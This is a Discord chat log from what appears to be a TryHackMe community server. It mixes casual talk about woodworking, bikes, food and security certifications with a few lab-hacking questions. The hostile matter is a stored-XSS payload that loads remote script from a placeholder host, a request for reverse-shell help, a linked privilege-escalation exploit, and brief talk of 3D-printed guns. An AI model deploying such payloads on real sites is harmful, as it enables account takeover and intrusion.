#general
Nope, custom lab
Thing is, Even though the campus is open until 10pm, a lot of execs might have gone home or stay late to work without distractions, y'know?
Imma try to make a pirate treasurechest with an arched lid from palletwood.
that always fascinated me, how do you make an arch?
Gonna be a long process, as I'm intending to use this one to make templates and such, so I can churn them out
it's called 'coopering'. partly maths, partly trial-and-error. Depends a lot on the width of the planks
so like a fine specimen to use as an example for further made chests?
That being said, I aint doing no maths. Imma eyeball it/offer it up to get the measurements.
Kinda, yeah
Once the basic box is made, then I can go mad making them look sweet
sounds too hard for newbies like me
Haha, nah. most things in woodworking come down to a box.
A table is just a box with 1 side
It's the same as everything though. The deeper you get into it the more tricky it gets, but it's a surprisingly low bar to get started
Jigsaw, Drill, Ruler, pencil and sandpaper.
Don't even need expensive tools to begin
In fact, seeing Kevin typing - a bunch of my tools are from Gumtree (UK Craigslist style thing)
haha i just dont want to be scammed
ok i trust gumtree now
The benefit of Gumtree or Facebook marketplace is if you pick the thing up, you can go look at it first
yeah i made a facebook account recently for marketplace
Haha, i never said that, just enumerate. If someone is selling a £5000 laptop for £30.. Maybe second guess it
dude second guessing is how you miss good offers /j
sometimes you just get really lucky. A few months ago, I saw a table saw at a decent price. Turns out the guy was retiring and closing down his shopfitting business. Went over there, Ended up buying the saw, a nailgun and a big chip extractor.
(I almost typed shoplifting business.. That would have been funny)
i'm still far from setting up my own workshop(i.e buy tools) since my parents won't allow me to do such stuff. It's only possible after I move out
ppl always have reasons to sell stuff, i want my first car to be a honda jazz or something cause ppl are always selling it
for how much?
Another guy was selling wood-turning chisels SUPER cheap. New they'd be £30-£80, this guy was letting them go for £1-£3. Turns out it was a whole bunch of stuff from a buddy of his who passed away. Walked away with a whole box of stuff. Maybe 25 chisels, and a bunch more woodworking things
anyone here available for room help. i already dropped my question, feel free to pls dm me thank you
just wanna get that lucky in life
sometimes its worth buying new cause of the hassle making it less fun, so my first bike might be a cr450 or something reliable with warranty
well i'm lucky enough already, better not be greedy
idk about woodworking so i guess thats an ok deal ? lol
oh i misread
the table saw was £90 and was a dewalt flip saw (Table and Mitre saw in one). Nailgun was a Paslode final fix gas/battery powered and was £100. And the chip extractor was another hundred. all in was about £700-£800 worth of gear
not bad for £300
under 300? stealll
random i found a dewalt table saw in this old property my dad bought
been using a lidl table saw for about 2 years till I got that one
i mean if it works
but i thought lidl was a grocery store
so unless its made of carrots
idk how that makes sense
Middle of Lidl, yo
parkside (i.e Lidl tools) are ok for Right Now, or if you're only gonna use it occasionally. Medium/Heavy use stuff will break - but thats ok, cos then you know its worth investing in a decent brand
Welding is actually something I've never tried
im going to start next week
i was meant to yesterday
basically i made a deal with some albanian mechanics
Thats pretty sweet.
There's an approach to tools that I like. Buy the cheap one and if you wear it out, get the fancy one
haha, at the mention of metalwork... James appears
thats what i do except i buy the same one ...
Me? Metalwork? Never
Except Dremel - the parkside one is terrible. Go straight for the branded one
I keep seeing milling machines appear on liquidation auctions. Just don't have space for it. Or the money
Well, I'm always for people building things
why cant there be delta mills
cause then i can do additive manufacturing and stuff super quickly on the same machine
I don't really know what one is, but shrug.
ninja james
i love having a diy mindset, if i had the time and the tools i'd have made everything myself except clothes cuz that's hard
Well, the trick is to make the stuff using the cheaper methods, even if it takes more time. then you can decide if it's worth investing in
If you are still learning, then your time isn't really 'worth' much. (My mindset is around selling the final product)
my message wont send ill retry
makes sense, still it might lead somewhere and eventually lead to something that might be worth it
Yah, My friend is a ninja with a sewing machine. If I need any fabric stuff, she does it for me
imagine that with a pointy spinny thing at the bottom
Kevin - If it's a link or image, it won't send until you verify your account
Oh, links work
1984
Ok, so like a CNC machine?
Hello, I'm new here.
fun stuff fr, i never really got into fabrics except fixing my socks which was a disaster
yes but mill and 3 arms
Sounds like Dr Octo
i guess so
If you get one up and running, I'd be very interested. I'm sure ralexander would as well
My next purchase will likely be a bigger wood lathe. My current one is great for spindles and pens, but not quite big/powerful enough for bowls
ralexander is all about the 3D printing and laser engraving
And spooky symbols
and star trek stuff
I respect people who are able to diy their way in life. I do not have the patience for it.
I respect space. And frogs
who said they were patient ?
lol fair enough
being stubborn works too
not being patient is part of why a lot of us do it, lol
"no this has to go right here"
why would i wait for and pay for a contractor when i can just do the thing myself
rage-venting by carving up wood and drilling holes
💯
an awesome way to vent
true, from my perspective I tend to value time more so than money. If i have the money, ill just pay someone else to do it and save that time doing something else. That's just me though.
and it's satisfying
you know you're in the shit with git when even the internet can't answer your question
exactly,
i can end up with something not only worse, but more expensive and time consuming in the long run too
diy is always better
gemini/gpt
It's a balancing act. i like to think I know enough about a thing to know if I can do it, or to contract someone.
i can end up with something not only worse, but more expensive and time consuming in the long run too
honestly the same can be said about diy
new tool that i'll never use again? i'll take 5
Ok, I can get a ball joint fixed on the van - It'll take a mechanic an hour, Max. Or a saturday morning for me.
My time is free.
trying gpt :/
fair point, i may be silly but i just like diy partly because i feel like i can do stuff and partly because I anticipate an apocalypse where internet goes down
lol also good point
whats the git problem
good luck
yeah you could spend it working your own job whilst the mechanic works on it or be happy with an excuse
maybe maybe, or you just love plants
thats true, But why on earth would I want to be in work MORE often?
i do love plants
debatable
trying to maintain git histories on individual files within a subtree without having to manually check it out into an empty branch and place the files so git tracks their location properly -- the normal subtree behavior retains the history in the repo as a whole but loses it on the file, since the path is now different ,-,
im a frog rinzler
idk i like working until i have to do something not easy
plants are my jam, i love to sit on them
If it's a time-value thing - imagine you could do Everything. Then you could work a lot less and have more time to do the stuff you want, when you want
Zaclty.
i think like this a lot
then i work towards something
In order to learn everything, you need to try stuff and get better at it
but no plants in space
then theres a little challenge and i question every decision until then
Literally everything is in space
its a sacrifice i think about every time i wake up in the morning.
even nothing is in space
learning a new skill isn't a sacrifice. It's development
i can't seem to form an argument but i want to
thats next level stuff. never worked with git subtree
ez, rewrite git, make a contribution
admit defeat and next time refer to outer space
normally i defer to submodules, but github doesn't include submodules in zip downloads or release downloads, which is the main delivery mechanism here, so i have to merge the would-be-submodules into the repo normally ,-,
i blame github more than git
i'll go with that
okay..........i just tried a new merge strategy and it dumped the repo-to-be-merged into a random directory like 3 levels deep by itself
tf
how's that possible without specifying a path
or did it create subdirs?
like the path exists
but i don't remember having used it for anything in the last few hours, let alone anything related to the merge 😶
look at the rules maybe?
should i look for the best deals and post them here so you guys can help me confirm its legit, i don't make a lot of money so im not taking any more risks. i think after getting this i will save up for an air compressor and build a cnc machine to put in the garage so as soon as i can weld i can make custom bike parts and stuff then i wont have to work doing things i dont like until im 18.
any issues with this plan ?
no issue partially because i know nothing about bikes
wait what
air compressor, forged, carbon fiber - are all words that feel weird together
believe in yourself!
oh that was edited out lol
same but were not the same cause i watch occasional videos and tell myself i dk
yh cause icba to explain it to everyone but i might as well
by "bike" do you mean bicycle or motorcycle
making custom bike parts seems cool though. if thats what you wanna do, go for it
basically left over carbon fibre tow or prepreg can be put into a mould and then cooked; its common in the automotive world among enthusiasts for example, in fact lamborghini is trying to make connecting rods out of them
bicycles at first but when im older i want to work on motorcycles too, i want a custom dual sport or supermoto eventually to prove my abilities.
but i dont have them yet lol
or money
oohhhh i just noticed your profile picture Kevin. Mr. Mccandless made me really wanna go vagabonding when i was younger.
highly recommend. just a forewarning though if you plan on making custom parts for them --- if you make parts for other people that are structural -- like parts of the frame -- and something goes wrong, you would be on the hook
just keep liability in mind
but i do highly recommend getting yourself a bike in any case
anyone worked with terraform here with big clusters?
yes. and to answer your next question, no, i don't remember shit.
i wouldnt want that to happen; legally i get it but morally its wrong too
does it get supercomplex is the next q
i dont want to edd up is the next saw for ruining someones brakes
haha its not noticed much yk
honestly, even if i remembered anything, it'd be hard to say -- complex to someone down in EUC might not be complex to somebody in infra eng+auto
in our environment it was fine
the thing is, terraform is meant to simplify your complicated deployments -- if you're using it right, it will be making things easier -- but that's coming from what could already be very complex envs
could suck could not
@bleak dagger my definitely not biased whatsoever self recommends an MT07
i mean naked bikes are super cool but too scary for me, its a naked bike like the mt09 i see on ads right ?
dont doubt it. there was a novel written that was inspired by him. Into the wild. Was made into a movie and still is one of my favorite sound tracks. Who doesn't love eddie vedder lol
@molten sky , you have any experience with Kubernetes hardening?
mt07 and mt09 are both of the same family, actually (hence the similar name).
the mt07 is a parallel twin ~680cc and the mt09 is a 890cc triple
the sound track sounds very track
the 07 is quite a bit tamer but still torquey
haven't touched k8s a single time in the last like two years but we used it before that
ooooooo, did u do any hardening within the time u used it
you know maybe as my second bike, when i have more money and experience. id like to think im smart enough to know id get overconfident lol.
hardening is a broad term
i did but i can barely even remember how i managed it other than "oh yeah kubectl or something existed i think"
i'd need to brush up
why does your profile say fosscad, is that stuff even legal ?
I've setup a few on premise vmware clusters and on aws and gcloud
dont advertise this bro
if you like the style, they have the mt03 as well which is a lot cheaper and only a 300 class
but what you mean with hardening? setting capabilities on pods?
(if you wanted the naked style ofc)
federally 100% legal in the US
icl youre right
some states have laws about them but federally 100% kosher
(some rules, like you can't build to sell like a licensed manufacturer would, you have to have so many ounces of metal for metal detectors (defacto the firing pin, barrel, anyways), can't build certain Title 2 firearms without a stamp, but that's about it)
not really im not responsible enough but
its cool you can make anything innit
plastikov isnt fun ?
ik there're a few other countries who allow homebuilt, but i have no clue which ones
plastikov aint auto
why
semi auto is literally more complex than auto
fun to work on? can be. fun to use? i'd wager auto would be more fun
damn expensive tho
at 30c a pop that adds up quick
true but you can use it to make money
if you mean by selling, then unfortunately not in the US
ok ill stop there
oh yeah thats totally what i had in mind
not anything else...
oops ctrl v
can't seem to find any decent reference for international laws about it, but a bit curious now
Hi, I want to ask if there is any place to find offline applications on windows. Because almost every app want you to login and create an account and be online almost all the time. even a simple to do list app want you to make an account.
obv very limited
are you using the microsoft store? it sounds like you're using the microsoft store
dude i dont think dealing 3d printed arms is worth it
nope I don't use it. its bad enough
unless you have lots of people
unless that's a typo then yeah it wouldn't be -- it'd be simple to get licensed to do so, but even then, it's just not worth the trouble
building for yourself is fine (in the US) but dealing in them is a whole different issue
huh. not sure how you had that bad luck then, lol
for notes, things like Obsidian (paged notes) and Logseq (journaled notes) are extremely common, both being account-less (i just use that for todo stuff as well)
nix here, not windows, but i think they have windows apps too
@molten sky @bleak dagger Let's stop discussing 3D printed weapons.
k
😢
I will check them. thx
Gave +1 Rep to @molten sky (current: #87 - 72)
huh. haven't seen you in a while actually. this your daytime?
It's 9:22 in the morning and I'm making a coffee and bacon sandwich
Well, those are independent items
you're not that far off then actually. odd. but yeah that sounds tasty rn
Bacon sandwich will be with ketchup on a toasted roll. Coffee is with milk and no sugar.
should've made a bacon sandwich instead of having leftovers
i just use pan bread/sandwich bread for it instead of a roll but otherwise the same
i tend to prefer a ton of bacon rather than thick bread
throw the slab on
You've got to toast it though, on the inside
always toasted
(both sides tho, cause well, it's a toaster, and pan/sandwich bread --- if it was a roll then just the one)
Bacon is ruined by ketchup. Coffee is perfect by itself.



I agree on the coffee. But the bacon+ketchup combo is a killer
not normally, just when a sandwich
lol you have a thing for that? like you didn't type preference, you actually had a button for it
silly, but I like it
It's from a mechanical keyboards server, because that hobby often has people bashing others over a matter of personal preference
that tracks
oh for sure, its all down to preference, I was just stating mine
You have to have the ketchup though. It's a sour and sweet contrast to the salt on the bacon
I do love bacon with Cholula hot sauce
cholula i normally reserve for chili
sriracha i use more often
i actually need to buy some more now that i think about it
I wouldn't do sriracha with bacon, not a contrast
I travel a lot for work, mostly to the same hotel. They have little packets of cholula and so I always have it on me. I call it pocket cholula
same i'd opt for ketchup in the case of bacon
i use ketchup for literally two things, and that's it
fries and bacon sandwiches
pocket cholula
you get me!
Ah the age old debate
Brown sauce or Ketchup with bacon.
It's made by HP but it's not the same stuff
A1 steak sauce is in a class of its own, but im not putting that shit on bacon
HP Sauce is a British brown sauce [ . . . ]
explains why i didn't know wtf it was
we've got HP but not that
You uncultured swine! /s
a1 is fine
i find most steak sauce to just be a cover up for a bad steak
Peppercorn, pan sauces, all acceptable
Eh, I'm not too amazed at the Arc browser.
Unpopular opinion: butter on a well marbled steak is just a hat on a hat.
While both HP and A.1. may seem like copycat recipes of each other, the only similarity they share is that they are both tinted brown.
i think it's the cut that decides it here
in either case, the butter adds quite a bit of juice for you to soak up in your potatoes or veg or whatever else
soak up that steaky goodness into your garlic mash
I like the way you think
speaking of cut
ribeye is the only acceptable cut to get warmer than mid rare
a lil bit of extra time to help melt down that fat and it's perfect
agreed
agreed for everything except ribeye
ribeye has a ton more fat that you need to melt down
medium
We have different names for cuts here
Like our sirloin is your NY Strip or something
those are distinct cuts here as well
Judge me
cheese isn't melted yet am judging
@naive violet (context)
sirloin is much leaner
Maybe im dumb but those look like the same cut to me; marbling with a fat cap
similar, but different
the main difference is the amount of fat but the strip also tends to be a lot more tender
@molten sky https://steaksociety.com/steak-cuts/
We use sirloin to describe a different cut
The united kingdom
huh. thought the UK shared the name. was gonna say I knew Aus was different
ngl i don't know the last time i heard anyone say ny strip irl
always just strip steak
we have like all of those, weird that the US is excluded from em
We use so many different words, I find myself translating sometimes
except rump maybe
honestly flank is my favorite cut of meat that isn't a marketing term
perfect for a long marinade and its cheap as heck
you can use skirt steak to make some damn good tacos
same thing! flank == skirt
used as distinct cuts here, but both real good
Marinated flank
haven't marinated a slab of flank since the summer --- was tasty
I love to cook
but yeah around here at least, flank refers to the meat around the abs while the skirt is lower
skirt is more meaty taste wise but also not as tender
so if you're shredding it for fajitas or tacos or something for example, skirt would be ideal
oh dang I thought they were the same
they look quite similar tbh
and it's not as distinct of a difference as say, ribeye to a filet would be, but a difference is there
idk if i've ever purchased skirt without the intent to shred it for something
definitely 100% anatomically accurate beef factory (see abdominal area for skirt and flank)
Hi! Does anyone know which rooms or labs Heath Adams (thecybermentor) has created on tryhackme
Is this for an internship? ๐
Yea lol
Then we can't help you.
MadScottishburd asked the exact same thing yesterday ๐
I found one but I'm confused
For the exact same reason. 
Oh lol
This is to test your research skills, not ours.
Whats it about? Is it a task in one of heaths certs?
Guess we are doing the same internship then
Or using the same materials.
She managed to work it out
Nah.. we just needed to perform an OSINT to find a room created by someone
hmmmm
Came to the conclusion it was heath
And found one. Cuz i did the Advent of cyber few months back
But i was wondering if he made more
I know the answer, I can't tell you though.
Apt upgrade fix missing takes forever
Sure no worries
I think so. He's been around since the start of THM (i think)
Yea he might have
Would be so much easier if i could find his account on thm lol
Looks like you're gonna be checking each room individually ๐
What's better, apt, pacman or snap?
Yup I'll do that
Or is it just user preference?
Preference mostly.
Aein - theres only 798 rooms, shouldnt take too long :p
Is it okay to install two different ones?
couldnt possibly be a better way to search or filter
Nah, there is more.
manually is probably right.
Yup 😭
Damn
Hydra to crack the password (or room in this case)
782 rooms now.
Feeling like gojo after he said "nah I'd win"
The bot is rate limited.
Btw his room is free right? Cuz i don't have the premium rn
Hang on I'll check
Think about it, Shadowy. What sort of course would ask people to find info?
Sure
Yes.
They're free.
I know OSINT but is it part of THM? Or something else?
Nice
No it's not part of thm
External internship.
Yes this
I knew as soon as you asked.
Yup.. I'll go hunting now bye
I mean, there is literally websites and tools that do it for you, why bother copying the code?
Isn't that how most phishing links would work theoretically?
Is it not dangerous to show photos of the Mona Lisa, when people could copy the colours and make a painting that looks identical?
It's one way.
I'm sure there's plenty I won't ask about
There is a lot to unpack with that question @rapid merlin
If only there was someone with multiple arms/hand to help unpack it
The quickest answer is PKI and trusted certificates
I nearly got done over by a dud certificate. Looked fairly legit though.
Dud is definitely not the correct word but along those lines.
I think i found it lol
🥳
See? You didn't need us
Remember Aein - you are a castle. you can stand against anything
How long is your internship?
Well all i needed was motivation from u guys
3 months
Someone been playing AoE 🤣
Unpaid?
Do you get a job or anything out of it?
Hi
Unpaid
Or the potential job application?
Oh 😦
Gday
Yeah, I knew it was remote.
It's manageable
How's it going?
I know some details from another community member who is doing it.
For the HTML part. modern websites dont really rely on HTML anymore. its all DOM and JS or variations of JS. That being said, even if you could perfectly mimic the look and feel of a legitimate website, PKI and trust chains typically ensure that you can trust the website you are browsing because the Certificate Authority has done their due diligence to ensure the validity of the website. PKI isn't perfect and things like certificate pinning have shown over the years why it isnt perfect, but its pretty good
Scrubz can I ask how long u been in IT/Cyber?
Is that when u first completely started?
Well where I'm from.. they make u do unpaid internship for 6 months even that is WFO.
Nah, I used to be.. um...
Not white hat in 90. early 00's.
but thats all been..... scrubbed... away
Web application security is a deep and nuanced topic, but you can be fairly certain that if a website is using TLS and has a valid certificate they are who they say they are.
🤣🤣 nice
It definitely has!
Now I'm a member of a good community, where I enjoy helping people learn.
Not white hat as in opposite? Lol
Maybe don't pull on that thread
I'm not going to say anymore
Bruh
If someone claims a hat, you know they are old
No judgments here, awesome what ur doing
I also get the benefit of being a volunteer for THM.
U build computers n stuff quite young?
Yeah.
I've loved computers but could never wrap my head around the hardware fully.
I understand it better but yeah still a learning curve.
@glass nest hey do u think i can get the ejpt if i go through all the materials they provide?
in a heartbeat. That being said, might be worth investing in a slight higher-level cert that costs the same
You can get a PC build simulator on Steam
It's just like the real thing.
87% idk if it's my Internet being slow or my old laptop lol
How realistic is it?
Hmm yea I'll be doing those too.. planning to collect all the certs like infinity stones
Do parts blow up if u do it wrong 🤣
I mean I know what the parts do but fitting them in. I was never good at jigsaws.
Oh..
I've figured just stick to the certs you need.
Too many certs can damage your job applications.
I assume as you progress, stuff like Sec+ doesn't exactly matter.
So i need to earn only those which will help me on my journey
Or the ones your employer needs you to have, and will pay for.
Bingo
Do we just pay for the starting ones and most employers pay for the rest?
Well in my country u need to have atleast 2 to get a job
Pizzaology with a minor in sauce dynamics.
Which country?
I maintain CASP and CISSP to cover IAT and IAM III
India
So Ceh and something else.
otherwise its a ton of money to maintain anything more
1st is CEH
Yes
Sorry to hear that,
Eightgloves - HR Filter in india.
I'll be giving ceh next month due to this
A+ is very basics. almost too basic
Ceh is MCQ?
Yes
I thought the new version had a practical element?
The best thing about CEH is the title
If you mentioned CEH in the US you would be laughed out of the room
i think PNPT was originally PEH for the badass title
I bought the voucher when i was in college a few months ago and didn't know anything cyber.. cuz my professor told us that it was the best thing to get into cybersec
And i was like nice
in India, Yeah. It opens the doors. Other places in the world, not so much
Yup
I think it'll Change in a few years tho
But thats the thing, get the certs that are marketable in your locality
Even if they are CEH
What's the best in NZ?
Yea
I have a few certs I personally hold in high regard, but at the end of the day its about getting into the workforce
those pineapple candies?
That's y i was asking about ejpt
I'm not sure tbh.
Cuz some recruiters tells us to clear it in a month to show them that we are worthy
Well, I did eJPT for fun. you get 3 days, but I did it in a few hours. Like.. I went over the whole thing again to make sure.
I've just been thinking the main 3 Comptia ones
It surprised me that I'd answered all the questions
Net, Sec and A
Cuz u the goat
Can't go wrong with those, surely.
Nah, I don't think you can.
Anyone here skilled in upload rev. shell can DM me? dont want to spam here. Thanks! :))
look through the Syllabus for A+. for real, People have said 'If you can turn on a computer, you can get A+'. getting any other CompTIA cert probably over-rules it.
The package manager upgrading been waiting on me to type Y for the last 30 minutes, me thinking it was just taking forever.
Why do you need to DM?
Surely this could help other people?
-y won't need interaction.
good morning
eh, we are just chatting random here
Hello Hello.
Yeah it wasn't working with that properly for some reason.
Isn't their also websites for that lol
There
@glass nest what do u do for work
Yeah, but they might be doing something wrong.
I make and deliver edible circles of joy for people in the southwest UK
me or esqy?
Nice
Very true. I forgot the website name I use in particular but there's an option for a lot of different rev shells. Not GTFObins. It's like a generator though.
ben - Lets be honest, whatever you do... Making pizzas is bae
Great for THM CTFs
Ah sorry man i replied to you
That one?
true true. making circular dishes of various sauces, cheese and meat is gooooood
If you upload rev. shell on a website, and you are receiving error like The image cannot be displayed because it contains error - netcat is not showing any attempts for rev. shell. Is there any solutions or anything like that? I have tried revshell.com generator with encoding and everything, still no luck. Worst part is that its not even trying to attempt connection so I have no clue what to do next. I did complete whole upload room on thm so Its not an issue to upload, but to create connection on rev. shell. Checked IP and PORT as well, its correct for sure.
Part of a.... well rounded... diet
Fun fact.. i ate my first pizza when i was 22
Which website are you doing?
Well 2 years ago lol
@lone thistle Have you seen the DIRTY cookies we have now? It's basically a whole creme egg baked inside a cookie
I have heard of 'em aye
My son won't stop banging on about them.
Apparently the whole country practically sold out in a week
He wants a dominoes every night because of it.
Haha. See this is why plymouth is better. I know some people and could hook you up
sue me but I'm not a sweet tooth person, I don't get the hype
Yeah, but you're hours away
Well see you guys around. Have a nice day
Its a private lab in VM, there is no walkthrough on a website and im trying to understand this upload vuln.
As someone who doesn't like creme eggs anyway it was a solid pass
Then it may be with how the image is being uploaded and not necessarily the payload itself (although that could be it). Hard to tell without knowing the web app stack, the web app itself etc, if it's even possible
Google file upload bypass
It's like i don't even know any of you any more. SMH
Guys I have a box with Ubuntu 22.04 and this exploit:
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
is working well so I can privesc. But I was also using LinPEAS before and "Linux exploit suggester" did not tell me.... Any ideas why?
To be fair, I have a bit of a sweet tooth, and I can only stomach 1 of them
I don't even buy much junk anymore tbh, too focused on trying to eat my diet which we will discuss no further
Good for you, taking control
May as well, your body is the only home you'll ever live in forever
Until I get uploaded to a San junipero style VR
Might be, thank you. Its CTF therefore there is some vuln. and I focused on upload but it looks like there is no go for me there, either its not possible or im doing something wrong even that idk what
Gave +1 Rep to @lone thistle (current: #8 - 810)
Haha, I can't wait till there are some more big steps with VR
Ready Player One coming soon...
Yah. looking forward to haptics and stuff becoming a thing
There also comes downsides with that
I think the more advanced our VR gets the further people become anti-social
I'd argue the opposite might be possible also
i guess so, but on the other hand other opportunities will open up
Yeah it's an interesting thing to think about
I just hope that we don't get more out of touch with people
Discord for example, helped me to learn how to socialize with people than just "being out there"
hi
Do you interact better in real life as a result?
is this a coding server
There's a gain yeah, I can practice in vc, stand up, pretend they're in front of me, then apply that IRL
I think honestly online platforms don't help me as people will often mask. They don't act their true selves online at all imo
That's pretty cool, I'm glad it builds your confidence
I try to.
Yep it's a useful tool
Opposite for me, my beliefs/values are unorthodox where I live so I have to mask
Yeah, I have spent a lot of time in questionable communities where people don't xD it's nice to be in something more laid back
Interesting
It's an acceptance thing, I have friends online who would accept my values fully, which is hard to find IRL
It's the difference between a learning environment and a fan environment
And no I don't mean criminal anarchy values, values that are normal to you, which are not normal where I live
Yah, all equal on here
Training the next gen of cyber defenders and warriors is pretty shweeet though
Are you from the west?
Yeah there's lots of egos in skid communities
everywhere has a west
Oh yikes
If you don't, you're an outlier, at least the people around me see it as that
Unfortunate but at least you can find like minded people online ^_^
Yep, I'm thankful for that
half of europe is like that too
I'm somewhat aware yeah
But yeah, none of that is here, and can't really comment on local cultures etc.
personally? I don't care where you're from, what you believe, who you're attracted to or what you identify as. Alls I care about is people being excellent to each other.
My beliefs lie in the traditional Stoic camp, so same
who is lockbit?
Can you get reverse shell from stored xss if script alert is working? Thanks!
@glossy portal This isn't appropriate for here
Do you know how XSS works?
Yes, I guess I asked in a wrong way. Let me rephrase it. I have tested the following script in a working XSS but it's not giving me a reverse shell, IP and port are correct.
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
Any other ideas how to make xss reverse shell working. Thanks :))
XSS can't lead to a reverse shell.
It's not code execution on the underlying system.
I see, thanks for explanation
You'd have to chain it or hope that JS is run server side
I want to be a hacker, how to start?
Have a read over #start-here
It's the largest cyber gang least it was.
@sick lance When did you signup to the arc waitlist (if you can remember)?
Thursday
Student email?
Yeah, students get 24 hours.
Ah, thought so - Okay cool
Hi guys
I'm new here
Wow that's really interesting
Hello
How's your day going
Awesome
I just have the ambition of being a hacker
But I don't know where to start
Hell yeah
Thanks
Gave +1 Rep to @wintry sluice (current: #2006 - 1)
I want an Ironman one of these
I think I seen the endgame funko pop of iron man
There was also like dr strange and stuff
Nice
Casually bumped into a dude repping THM Merch
|| @mossy river ||
Gotta respect the drip
Can I install Kali Linux on WSL2?
hackerman
Well, I want to start out with ethical hacking!
lol
Can someone advise me?
Now we know an osint point for Jabba
Good luck finding me among all the other students at Warwick
now even more info
Too late

hey is it safe to use kaspersky cus i heard the russian government has backdoor in it but im not sure if true
not quite sure about this propaganda but i use malwarebytes and i think it's the best AV out there
If you don't feel comfortable with the possible government ties, use something else.
im just asking if its true
im just asking if theres evidence
i couldnt care less if vladamir putin has my search history, i dont criticise him lol
was just curious
From that response, I'd say you do feel uncomfortable. That means use something else.
https://en.wikipedia.org/wiki/Kaspersky_bans_and_allegations_of_Russian_government_ties
Just look at the citations for evidence
Kaspersky Lab has faced controversy over allegations that it has engaged with the Russian Federal Security Service (FSB) to use its software to scan computers worldwide for material of interest - ties which the company has actively denied. The U.S. Department of Homeland Security banned Kaspersky products from all government departments on 13 Sept...
Whether the evidence can be trusted is a different question.
Oh u a Warwick student?? I got personal beef with Warwick from a university ctf I did last year
Which CTF
Sheffield Hallam university
Did Warwick beat you or something
Yeah man, Warwick had 2 teams, both sat right next to each other and of course they're top 2
We came 3rd, but Warwick was a conjoined force of 10+ whereas we were a team of 4 lmao
Common Jared W
I'm sure they weren't particularly exciting, like Warwick 1 & Warwick 2
Hey with 3rd place we did get some HTB vouchers and a bronze spray painted Amazon essential keyboard
Hmm, I don't remember any CTFs last year but I also don't really remember last year
That's a great prize lol
Out too busy at Spoons
Speaking of, Jabba, lmk if you're down my way
Of course
THM Official meet-up when
Let's all just meet inside a web shell
Address is 127.0.0.1 right?
Since we often use Anonymous as an entry point for more information, doesn't it make sense to block/delete the user as far as defense is concerned?
Huh?
I agree with Jabba.
Let me clarify it XD
Often when we check ftp/smb we use the anonymous user, where we can find some information. Doesn't it make sense to block it via configs in case we are system administrators?
Of course. Unless theres a reason to keep it 'public'.
Thank you very much for the answer!
You should always remove anon login lol
I was wondering cuz this is a entry point in some cases
the reason we check is in case a sysadmin left it on by accident
Do you know how many have anon login on smb in the world rn with financial data open to the public?
A lot
Lots of 'hacking' is just finding stuff that a sysadmin got wrong, forgot, didn't know about etc
thank you guys, love this community.. i was wondering and now im a bit smarter XD
Tough call. PNPT is fun, but not widely known yet
Hehe
Well, Honestly I like TCM. The couple of times I've spoken with him, seems like a really good Egg. I don't know too much about the HTB crew other than Emma
Hmmmm
The HTB academy was a bit... hmm.. when it was released, with that 'Cube' system. I think it worked out that you'd be spending a few hundred bucks on content you can get for free elsewhere. I have been out of the game for a while, so that might have changed
I'll probs go cpts into pnpt tbh. I just hate reading. The videos in ejpt were better
Yeah. Apart from how the guy says 'Meterpreter'
Or the other guy
'Meter Preter'
Funnily enough he says it the other way later in the videos...
The ejpt content was good - Is it all still free?
Ah, so you buy the cert, then get the content for it. I suppose that how a lot of other places do it
Or you do the monthly sub and buy the voucher for like 250
Are you planning to do both?
HTB Academy is really really good. If you've got an edu email it's also very cheap
Lots of content for a great price
I say it meh-terpreter
Mater Pater
Meter Reader
Aye, i think it was just the pricing structure that put me off. I'm not in education, so I don't get any of them tasty discounts
Yeah fair enough. I think the subscription without the discount is still worth it, but defo more expensive
my friend just got his data reset by a hacker, the hacker got his email and reset his phone with an app called find my device, and I wanna ask how do we prevent someone that has access to our email from resetting our phone, cause this is kinda scary
use a strong password, check ssl cert before inputting it for email
so there is no like setting to not letting our phone got resetted by someone on our email ?
Maybe, but that would be to do with iphones settings
wdym reset
as in his phone got hard reseted?
I think there's an apple feature that allows you to do that remotely, not sure
Aces - Its a thing you can do. There are services that can brick your phone remotely if it gets nicked
ooh
Personally wouldn't enable it, but that's my own threat model
thats kinda dumb tbh
Nah, it can be very useful if you have sensitive data on there that you need to get rid of if it falls into the wrong hands
Oh it can be used to back your stuff up as well
I can see the appeal. if there is no hope of recovery, making it so the thief can't use the phone feels good
Well they can still use it...with a new account
While Stealy McStealface racks up a bill calling the talking clock in Korea?
and you don't have a phone, so harder to call them
never thought about that lmao
not if you brick it
Morning!
I don't think the feature is to remote brick it
Erase, not brick
then whats the point if the bad guy can still use your phone?
Don't enable it on your device, use 2FA, have a secure password.
Your friend has been compromised. Also you can't erase the device remotely, only lock it
i get the erasing the data but
You erase all your sensitive data
oh, I thought you could fully brick it
I stand corrected, you can erase the device
?
thats when you call your provider
Or... just don't have sensitive data
my guess is you would erase
and then call your provider to shut it down
incase it got stolen
of course
i can run whatever os i want on an asus chromebook right ?
There's a difference between your phone as in the mobile network provider and your phone as in an actual device to use
hm
yeah i never had to do any of this so its new to me
interesting tho
hopefully i wont ever have to

welp hope your friend figures it out
ye his phone got resetted lol, I just know that if we have someone email then we can reset another phone on that email too

And let me congratulate you on having a friend ๐
(i'm just salty cos my 2 besties and their kids (my godkids) are in Canada for the next 1.5 years)
welp the years fly by
I am kinda yeah. I like having multiple certs from different vendors
Isn't it a bit of redundant?
Mknukn i bought this is how they tell me the world ends
NICE how is it so far for youu
Can be. Some jobs look for one others look for another
I never see an issue with having both. My eJPT expires after 3 years. I'd like to have one PT cert before it does
Do the older ones expire?
EJPT expires after 3 years. After elearn took over I think they required a retest as their exam changed
Ok, I understand that, isn't it then more beneficial for you to take one thats looked for the most
That would depend on your local area
Not but for real I'd say most likely cpts or offsec certs
CPTS is I think is the best bang for your buck
I'd say it goes like CPTS > OSCP > PNPT
ill send it later
Like you said Tcm is newer and lesser known so it wouldn't get as much recog
You can run any os on any machine as long as it's compatible with the sys reqs
No not really, I just think the course is bad for what you get
Oh dam really
From people I'd spoken to they all seem to put the point across that OSCP is a huge shortcut to getting hired, you'd say the same about CPTS?
the TCM community are great as well.
I've also heard from many that OSCP is dated
Can't be as bad as ceh
I can't really say much but I think the CPTS is one of the best courses you can buy for its price point
One use of msf in the entire exam and it has tool restrictions
Yeah can't go wrong for 200
OSCP is also good, I don't think its dated, it was also recently updated and when I took it, the content was enough to pass
I can't justify 2000 dollars for a cert right now tbh
Thanks man, my university is putting me through CEH this year but was looking into ejpt & oscp as well. Will look into cpts:)
Gave +1 Rep to @simple valve (current: #24 - 344)
My sound system in my car isn't working
